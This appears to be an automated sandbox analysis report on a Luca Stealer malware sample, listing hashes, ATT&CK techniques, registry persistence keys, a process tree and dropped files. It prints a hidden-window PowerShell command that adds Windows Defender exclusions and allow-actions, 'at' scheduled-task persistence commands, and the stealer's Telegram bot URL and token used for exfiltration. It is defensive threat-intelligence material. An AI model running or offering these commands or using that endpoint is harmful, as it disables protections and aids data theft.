lucastealer | 88861277bd4781714d1b18b762a3323c3395da2eb5b0afa5ebf07253020f2482

Analysis

max time kernel
150s
max time network
139s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
10-05-2024 05:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

803a5924f2a740903ad7878426750440_NeikiAnalytics.exe
Size

4.8MB
MD5

803a5924f2a740903ad7878426750440
SHA1

147060843a83ee2a8ee813b4a25c64e894f14e71
SHA256

88861277bd4781714d1b18b762a3323c3395da2eb5b0afa5ebf07253020f2482
SHA512

055bd00d049c26fdb11d660bb7bed5967d478366025e5f9931c60fea16517811acf5fa22cf73fb4a5826b712a792c7f2fd604d21704b0a1d26786c9203f67dbf
SSDEEP

98304:zdItrbTA1mYcXLW6jRhdGVQguhhW31ZK7nh:zwc1j0L5LdGVzu+lah

Score

10^/10

lucastealer evasion execution persistence stealer

Malware Config

Extracted

Family

lucastealer

https://api.telegram.org/bot6068798932:AAG_cHiqinDwNZ3Hd-rdp8tPwbT0czdVwTw

Signatures

Luca Stealer
Info stealer written in Rust first seen in July 2022.
stealer lucastealer

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

explorer.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Windows\\explorer.exe, c:\\windows\\system\\explorer.exe"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Windows\\explorer.exe, c:\\windows\\system\\explorer.exe"	svchost.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

explorer.exesvchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	svchost.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2132 powershell.exe
2132 powershell.exe

pid	process
2132	powershell.exe
2132	powershell.exe

Modifies Installed Components in the registry 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svchost.exeexplorer.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	svchost.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}	svchost.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	svchost.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	svchost.exe

Executes dropped EXE 10 IoCs

Processes:

803a5924f2a740903ad7878426750440_neikianalytics.exe icsys.icn.exeexplorer.exespoolsv.exesvchost.exespoolsv.exeUHCDXQ.exeuhcdxq.exe icsys.icn.exeexplorer.exe

pid	process
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2664	icsys.icn.exe
2628	explorer.exe
2696	spoolsv.exe
2588	svchost.exe
1928	spoolsv.exe
1620	UHCDXQ.exe
1388	uhcdxq.exe
772	icsys.icn.exe
2296	explorer.exe

Loads dropped DLL 21 IoCs

Processes:

803a5924f2a740903ad7878426750440_NeikiAnalytics.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exe803a5924f2a740903ad7878426750440_neikianalytics.exe UHCDXQ.exeicsys.icn.exe

pid	process
2984	803a5924f2a740903ad7878426750440_NeikiAnalytics.exe
2984	803a5924f2a740903ad7878426750440_NeikiAnalytics.exe
2984	803a5924f2a740903ad7878426750440_NeikiAnalytics.exe
2664	icsys.icn.exe
2664	icsys.icn.exe
2628	explorer.exe
2628	explorer.exe
2696	spoolsv.exe
2696	spoolsv.exe
2588	svchost.exe
2588	svchost.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
1620	UHCDXQ.exe
1620	UHCDXQ.exe
1620	UHCDXQ.exe
1620	UHCDXQ.exe
772	icsys.icn.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

803a5924f2a740903ad7878426750440_neikianalytics.exe explorer.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\skyp\\Microsoft Update.lnk"	803a5924f2a740903ad7878426750440_neikianalytics.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\system\\explorer.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\system\\svchost.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\system\\explorer.exe RO"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\system\\svchost.exe RO"	svchost.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\803a5924f2a740903ad7878426750440_neikianalytics.exe	autoit_exe

Drops file in Windows directory 6 IoCs

Processes:

explorer.exespoolsv.exesvchost.exeicsys.icn.exe

description	ioc	process
File opened for modification	\??\c:\windows\system\spoolsv.exe	explorer.exe
File opened for modification	\??\c:\windows\system\svchost.exe	spoolsv.exe
File opened for modification	\??\c:\windows\system\explorer.exe	explorer.exe
File opened for modification	\??\c:\windows\system\svchost.exe	svchost.exe
File opened for modification	C:\Windows\system\udsys.exe	explorer.exe
File opened for modification	\??\c:\windows\system\explorer.exe	icsys.icn.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

803a5924f2a740903ad7878426750440_neikianalytics.exe icsys.icn.exeexplorer.exesvchost.exe

pid	process
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2664	icsys.icn.exe
2628	explorer.exe
2628	explorer.exe
2628	explorer.exe
2628	explorer.exe
2588	svchost.exe
2588	svchost.exe
2628	explorer.exe
2588	svchost.exe
2628	explorer.exe
2588	svchost.exe
2588	svchost.exe
2628	explorer.exe
2628	explorer.exe
2588	svchost.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2092	803a5924f2a740903ad7878426750440_neikianalytics.exe
2588	svchost.exe
2628	explorer.exe
2628	explorer.exe
2588	svchost.exe
2588	svchost.exe
2628	explorer.exe
2628	explorer.exe
2588	svchost.exe
2588	svchost.exe
2628	explorer.exe
2628	explorer.exe
2588	svchost.exe
2588	svchost.exe
2628	explorer.exe
2628	explorer.exe
2588	svchost.exe
2588	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

explorer.exesvchost.exe

pid process

2628 explorer.exe
2588 svchost.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2132 powershell.exe

pid	process
2628	explorer.exe
2588	svchost.exe

description	pid	process
Token: SeDebugPrivilege	2132	powershell.exe

Suspicious use of SetWindowsHookEx 20 IoCs

Processes:

803a5924f2a740903ad7878426750440_NeikiAnalytics.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exespoolsv.exeUHCDXQ.exeicsys.icn.exeexplorer.exe

pid	process
2984	803a5924f2a740903ad7878426750440_NeikiAnalytics.exe
2984	803a5924f2a740903ad7878426750440_NeikiAnalytics.exe
2664	icsys.icn.exe
2664	icsys.icn.exe
2628	explorer.exe
2628	explorer.exe
2696	spoolsv.exe
2696	spoolsv.exe
2588	svchost.exe
2588	svchost.exe
1928	spoolsv.exe
1928	spoolsv.exe
2628	explorer.exe
2628	explorer.exe
1620	UHCDXQ.exe
1620	UHCDXQ.exe
772	icsys.icn.exe
772	icsys.icn.exe
2296	explorer.exe
2296	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

803a5924f2a740903ad7878426750440_NeikiAnalytics.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exe803a5924f2a740903ad7878426750440_neikianalytics.exe cmd.exeUHCDXQ.exeicsys.icn.exe

description	pid	process	target process
PID 2984 wrote to memory of 2092	2984	803a5924f2a740903ad7878426750440_NeikiAnalytics.exe	803a5924f2a740903ad7878426750440_neikianalytics.exe
PID 2984 wrote to memory of 2092	2984	803a5924f2a740903ad7878426750440_NeikiAnalytics.exe	803a5924f2a740903ad7878426750440_neikianalytics.exe
PID 2984 wrote to memory of 2092	2984	803a5924f2a740903ad7878426750440_NeikiAnalytics.exe	803a5924f2a740903ad7878426750440_neikianalytics.exe
PID 2984 wrote to memory of 2092	2984	803a5924f2a740903ad7878426750440_NeikiAnalytics.exe	803a5924f2a740903ad7878426750440_neikianalytics.exe
PID 2984 wrote to memory of 2664	2984	803a5924f2a740903ad7878426750440_NeikiAnalytics.exe	icsys.icn.exe
PID 2984 wrote to memory of 2664	2984	803a5924f2a740903ad7878426750440_NeikiAnalytics.exe	icsys.icn.exe
PID 2984 wrote to memory of 2664	2984	803a5924f2a740903ad7878426750440_NeikiAnalytics.exe	icsys.icn.exe
PID 2984 wrote to memory of 2664	2984	803a5924f2a740903ad7878426750440_NeikiAnalytics.exe	icsys.icn.exe
PID 2664 wrote to memory of 2628	2664	icsys.icn.exe	explorer.exe
PID 2664 wrote to memory of 2628	2664	icsys.icn.exe	explorer.exe
PID 2664 wrote to memory of 2628	2664	icsys.icn.exe	explorer.exe
PID 2664 wrote to memory of 2628	2664	icsys.icn.exe	explorer.exe
PID 2628 wrote to memory of 2696	2628	explorer.exe	spoolsv.exe
PID 2628 wrote to memory of 2696	2628	explorer.exe	spoolsv.exe
PID 2628 wrote to memory of 2696	2628	explorer.exe	spoolsv.exe
PID 2628 wrote to memory of 2696	2628	explorer.exe	spoolsv.exe
PID 2696 wrote to memory of 2588	2696	spoolsv.exe	svchost.exe
PID 2696 wrote to memory of 2588	2696	spoolsv.exe	svchost.exe
PID 2696 wrote to memory of 2588	2696	spoolsv.exe	svchost.exe
PID 2696 wrote to memory of 2588	2696	spoolsv.exe	svchost.exe
PID 2588 wrote to memory of 1928	2588	svchost.exe	spoolsv.exe
PID 2588 wrote to memory of 1928	2588	svchost.exe	spoolsv.exe
PID 2588 wrote to memory of 1928	2588	svchost.exe	spoolsv.exe
PID 2588 wrote to memory of 1928	2588	svchost.exe	spoolsv.exe
PID 2588 wrote to memory of 2916	2588	svchost.exe	at.exe
PID 2588 wrote to memory of 2916	2588	svchost.exe	at.exe
PID 2588 wrote to memory of 2916	2588	svchost.exe	at.exe
PID 2588 wrote to memory of 2916	2588	svchost.exe	at.exe
PID 2092 wrote to memory of 1620	2092	803a5924f2a740903ad7878426750440_neikianalytics.exe	UHCDXQ.exe
PID 2092 wrote to memory of 1620	2092	803a5924f2a740903ad7878426750440_neikianalytics.exe	UHCDXQ.exe
PID 2092 wrote to memory of 1620	2092	803a5924f2a740903ad7878426750440_neikianalytics.exe	UHCDXQ.exe
PID 2092 wrote to memory of 1620	2092	803a5924f2a740903ad7878426750440_neikianalytics.exe	UHCDXQ.exe
PID 2092 wrote to memory of 2508	2092	803a5924f2a740903ad7878426750440_neikianalytics.exe	cmd.exe
PID 2092 wrote to memory of 2508	2092	803a5924f2a740903ad7878426750440_neikianalytics.exe	cmd.exe
PID 2092 wrote to memory of 2508	2092	803a5924f2a740903ad7878426750440_neikianalytics.exe	cmd.exe
PID 2092 wrote to memory of 2508	2092	803a5924f2a740903ad7878426750440_neikianalytics.exe	cmd.exe
PID 2508 wrote to memory of 1524	2508	cmd.exe	reg.exe
PID 2508 wrote to memory of 1524	2508	cmd.exe	reg.exe
PID 2508 wrote to memory of 1524	2508	cmd.exe	reg.exe
PID 2508 wrote to memory of 1524	2508	cmd.exe	reg.exe
PID 1620 wrote to memory of 1388	1620	UHCDXQ.exe	uhcdxq.exe
PID 1620 wrote to memory of 1388	1620	UHCDXQ.exe	uhcdxq.exe
PID 1620 wrote to memory of 1388	1620	UHCDXQ.exe	uhcdxq.exe
PID 1620 wrote to memory of 1388	1620	UHCDXQ.exe	uhcdxq.exe
PID 2508 wrote to memory of 2132	2508	cmd.exe	powershell.exe
PID 2508 wrote to memory of 2132	2508	cmd.exe	powershell.exe
PID 2508 wrote to memory of 2132	2508	cmd.exe	powershell.exe
PID 2508 wrote to memory of 2132	2508	cmd.exe	powershell.exe
PID 2508 wrote to memory of 2052	2508	cmd.exe	reg.exe
PID 2508 wrote to memory of 2052	2508	cmd.exe	reg.exe
PID 2508 wrote to memory of 2052	2508	cmd.exe	reg.exe
PID 2508 wrote to memory of 2052	2508	cmd.exe	reg.exe
PID 1620 wrote to memory of 772	1620	UHCDXQ.exe	icsys.icn.exe
PID 1620 wrote to memory of 772	1620	UHCDXQ.exe	icsys.icn.exe
PID 1620 wrote to memory of 772	1620	UHCDXQ.exe	icsys.icn.exe
PID 1620 wrote to memory of 772	1620	UHCDXQ.exe	icsys.icn.exe
PID 772 wrote to memory of 2296	772	icsys.icn.exe	explorer.exe
PID 772 wrote to memory of 2296	772	icsys.icn.exe	explorer.exe
PID 772 wrote to memory of 2296	772	icsys.icn.exe	explorer.exe
PID 772 wrote to memory of 2296	772	icsys.icn.exe	explorer.exe
PID 2588 wrote to memory of 2976	2588	svchost.exe	at.exe
PID 2588 wrote to memory of 2976	2588	svchost.exe	at.exe
PID 2588 wrote to memory of 2976	2588	svchost.exe	at.exe
PID 2588 wrote to memory of 2976	2588	svchost.exe	at.exe

C:\Users\Admin\AppData\Local\Temp\803a5924f2a740903ad7878426750440_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\803a5924f2a740903ad7878426750440_NeikiAnalytics.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2984
- \??\c:\users\admin\appdata\local\temp\803a5924f2a740903ad7878426750440_neikianalytics.exe
  c:\users\admin\appdata\local\temp\803a5924f2a740903ad7878426750440_neikianalytics.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2092
- - C:\Users\Admin\AppData\Local\Temp\UHCDXQ.exe
    "C:\Users\Admin\AppData\Local\Temp\UHCDXQ.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1620
  - - \??\c:\users\admin\appdata\local\temp\uhcdxq.exe
      c:\users\admin\appdata\local\temp\uhcdxq.exe
      4⤵
      Executes dropped EXE
      PID:1388
  - - C:\Users\Admin\AppData\Local\icsys.icn.exe
      C:\Users\Admin\AppData\Local\icsys.icn.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:772
    - - \??\c:\windows\system\explorer.exe
        
        c:\windows\system\explorer.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2296
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\LHXDAZ.cmd" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2508
  - - C:\Windows\SysWOW64\reg.exe
      reg query "HKU\S-1-5-19\Environment"
      4⤵
      PID:1524
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Powershell -nologo -noninteractive -windowStyle hidden -noprofile -command $First = "Add-MpPreference -ThreatIDDefaultAction_Ids "; $Third = " -ThreatIDDefaultAction_Actions Allow -Force"; $ListID = 2147685180, 2147735507, 2147736914, 2147743522, 2147734094, 2147743421, 251873, 213927, 2147722906, 2147748160; ForEach ($ID in $ListID) { Invoke-Expression ($First + $ID + $Third) }; $ListPath = "C:\Windows\KMSAutoS", "C:\Windows\System32\SppExtComObjHook.dll", "C:\Windows\System32\SppExtComObjPatcher.exe", "C:\Windows\AAct_Tools", "C:\Windows\AAct_Tools\AAct_x64.exe", "C:\Windows\AAct_Tools\AAct_files\KMSSS.exe", "C:\Windows\AAct_Tools\AAct_files", "C:\Windows\KMS"; $First = "Add-MpPreference -ExclusionPath "; $Third = "-Force"; ForEach ($Path in $ListPath) { Invoke-Expression ($First + $Path + $Third) }; :Admin
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2132
  - - C:\Windows\SysWOW64\reg.exe
      reg query "HKU\S-1-5-19\Environment"
      4⤵
      PID:2052
- C:\Users\Admin\AppData\Local\icsys.icn.exe
  C:\Users\Admin\AppData\Local\icsys.icn.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2664
- - \??\c:\windows\system\explorer.exe
    c:\windows\system\explorer.exe
    3⤵
    - Modifies WinLogon for persistence
    - Modifies visiblity of hidden/system files in Explorer
    - Modifies Installed Components in the registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - \??\c:\windows\system\spoolsv.exe
      c:\windows\system\spoolsv.exe SE
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2696
    - - \??\c:\windows\system\svchost.exe
        
        c:\windows\system\svchost.exe
        5⤵
        Modifies WinLogon for persistence
        Modifies visiblity of hidden/system files in Explorer
        Modifies Installed Components in the registry
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2588
      - \??\c:\windows\system\spoolsv.exe
        
        c:\windows\system\spoolsv.exe PR
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1928
      - C:\Windows\SysWOW64\at.exe
        
        at 05:38 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
        6⤵
        
        PID:2916
      - C:\Windows\SysWOW64\at.exe
        
        at 05:39 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
        6⤵
        
        PID:2976
      - C:\Windows\SysWOW64\at.exe
        
        at 05:40 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
        6⤵
        
        PID:2732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\LHXDAZ.cmd

Filesize
1KB

MD5
15a1fe3d0f342bdd3232253c7810a05d

SHA1
b658e0d903b37bf12e8e640bece22f235552dc50

SHA256
4070dcb09b69ef57160fae0be5ee3664e39170eeacc46e6f50a080493552b338

SHA512
1961fc65a839c55806162a197385859cfe3a24551ab9b7e0121166eac5e5ae1a4a0d9180229d0ea0240dccb770e4c2d508577e60988c9271bb11f94de1897a35

Download Submit
C:\Users\Admin\AppData\Local\Temp\uhcdxq.exe

Filesize
5.7MB

MD5
2c2055233260e5bb20ce675afd39ed0d

SHA1
26c056ba8e99a3fb523612b422a85be3ecbbd5b3

SHA256
306827f0ef0a4cbecd5458776244bf7ee99f2e49569daf0034176b39f5d1c17d

SHA512
3e2a18cd0c7fe5e3529d37ac37b352f8c19d3fef947f117701bb712c19cb40ff3ed56c843c789334a6c93382deef1f5cf4a48fbadb6b1e46fe804b9430fa1546

Download Submit
C:\Users\Admin\AppData\Roaming\mrsys.exe

Filesize
206KB

MD5
9af373bcddadc4a8632b88c310a15180

SHA1
c0314026ffa48abc8e66dcad7c8ae4d76cf9c509

SHA256
64e85adc290e2a45ef950679934ff6ab989a7e679baba417e040b1cb557c52de

SHA512
20057da87b016948ef6d82f6809fe1d3e91db56070858978797c45f0412f6cc9cd508d8487527928f343077daa740290463e98a760b1cee7a227c795b8967684

Download Submit
\??\PIPE\atsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\users\admin\appdata\local\icsys.icn.exe

Filesize
206KB

MD5
c5f78d788265a8c2b80017a0dc351266

SHA1
32836c3ccaf84431beaba1b10107743c052cddc0

SHA256
0a48908b44578715b511d6c067b2b0c1351783c049c68183f6067afff1ff72d0

SHA512
0315d122adf425001109bae742a1aff418f301f46c3655bf3e3d0c12ecc03ac3d70b52a60a744f81b7b041d28bf235f3d93abc26c71bfdd388be6a145a1bbb16

Download Submit
\Users\Admin\AppData\Local\Temp\803a5924f2a740903ad7878426750440_neikianalytics.exe

Filesize
4.6MB

MD5
400963a830106421a9d61b7b40b05e0f

SHA1
53b16018e0d74617eae060357d93d77441fdd817

SHA256
ac522c65009170b03e879f555bedb6f39570e74f1e6330fa1ee196e39eff553b

SHA512
6a380fa79bb192fc12170c9248c1b287a22659c8bb710672d1dda22d64adc0e443c59d78e6181d7d20b80cf785cee6f33d3520752d4584d29f00e7737a5726bd

Download Submit
\Users\Admin\AppData\Local\Temp\UHCDXQ.exe

Filesize
5.9MB

MD5
021079dc0918b9c7359e93e770678000

SHA1
70c03da6f7b339340b1943f5d0b7b1fd87579adf

SHA256
ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487

SHA512
9bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0

Download Submit
\Users\Admin\AppData\Local\icsys.icn.exe

Filesize
206KB

MD5
deaa3ddf9f4cc261c6041f4908bf9406

SHA1
578370b878cb76b63f44416b9b0edc1051672c91

SHA256
1ff6acc579ff365aab17be1bea273be531da508d30825de6942d19a14d2839ea

SHA512
eff7fb6b5854d77b5a3584a94992cae0bd38dcfd26a873ea5d2485a918a85b0860b28c4112ce36c819fd29a6a1eee087a79aebc143473b592285b9dc213c48a1

Download Submit
\Windows\system\explorer.exe

Filesize
206KB

MD5
3b12d5dcbdaedd6b1d4c45c209c0208d

SHA1
139edd6d5694c29ebd7a85b07ee373976ef79a7e

SHA256
a78577e2a69c416ffe308a7bed3787513c0540a60c7c64aae49308410ec10cdf

SHA512
a1648e8fe69c2599ecd590a72ec99f0094b17dce1236c8eca2625f5401d09dafcb5176ddc0f14eea9fbbe2ff0628ea0d4e420f100f61b98379b0f25287fef90d

Download Submit
\Windows\system\spoolsv.exe

Filesize
206KB

MD5
a831667c950fed21cb482e7d99bc43bf

SHA1
bd7a045ff01911e2f8ce1d394a9e5f7b31555302

SHA256
1cf3c91de86985c88ffb521f98807c5e05dcd5ebbdacecb27280107135955952

SHA512
3e09466a845983e669c129b22a2957a8d1783e84973c42264a07d7814f493251fb0b5dc9c077bb52ca20de3d49ab62b3e18dc6d89ff96755a5ac6bce9622485e

Download Submit
\Windows\system\svchost.exe

Filesize
206KB

MD5
6f7880b86efe5e90958509324b985bf4

SHA1
3f138f3e917c12dd35fe3767136429d7a9be95e6

SHA256
4ccf6a4969ccf04b17d835c943bfaf136725281427c05de2e77c613714565ec0

SHA512
b569c16a923b46428de0de272cd61cf5c45c614eba5d2d071e217b77fb5d42725a9bce47ffabd1c02409cad548222ae366b3a996f96a93e50f72da144c472a8c

Download Submit
memory/772-155-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/772-167-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1620-116-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1620-151-0x0000000003130000-0x0000000003170000-memory.dmp

Filesize
256KB

Download
memory/1620-168-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1928-86-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2092-107-0x0000000004160000-0x00000000041A0000-memory.dmp

Filesize
256KB

Download
memory/2092-98-0x0000000004150000-0x0000000004190000-memory.dmp

Filesize
256KB

Download
memory/2092-97-0x0000000004150000-0x0000000004190000-memory.dmp

Filesize
256KB

Download
memory/2296-166-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2296-164-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2588-77-0x00000000004E0000-0x0000000000520000-memory.dmp

Filesize
256KB

Download
